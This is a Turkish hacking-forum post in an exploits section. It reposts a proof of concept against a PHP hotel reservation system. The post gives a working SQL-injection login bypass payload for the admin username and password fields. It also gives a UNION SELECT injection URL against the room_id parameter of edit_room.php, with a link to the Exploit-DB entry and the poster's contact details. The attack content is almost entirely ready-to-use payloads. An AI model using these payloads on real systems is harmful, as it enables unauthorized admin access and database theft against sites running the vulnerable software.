İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Simple Online Hotel Reservation System - SQL Injection / Authentication Bypass

28-02-2019 19:46
#1
Ludas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Ludas.py
Yaş:
19
Mesajlar:
216
Teşekkür (Etti):
27
Teşekkür (Aldı):
39
Konular:
28
Ticaret:
(0) %
# Exploit Title: Simple Online Hotel Reservation System - SQL Injection / Authentication Bypass # Exploit Author: Mr Winst0n

# Author E-mail: manamtabeshekan[@]gmail[.]com

# Discovery Date: February 25, 2019

# Vendor Homepage: https://code-projects.org/

# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/

# Tested on: Kali linux, Windows 8.1







# PoC: # Authentication Bypass:





# Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -





# SQL Injection: # http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi]



# http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20-



Exploit : https://www.exploit-db.com/exploits/46461

################################################## ###########

Anlamadığınız noktalarda Ö.M. ile sorun lütfen, seve seve yardımcı olurum. İyi günler dilerim.

################################################## ###########
Kullanıcı İmzası

|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|
Konu Ludas tarafından (28-02-2019 19:47 Saat 19:47 ) değiştirilmiştir.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı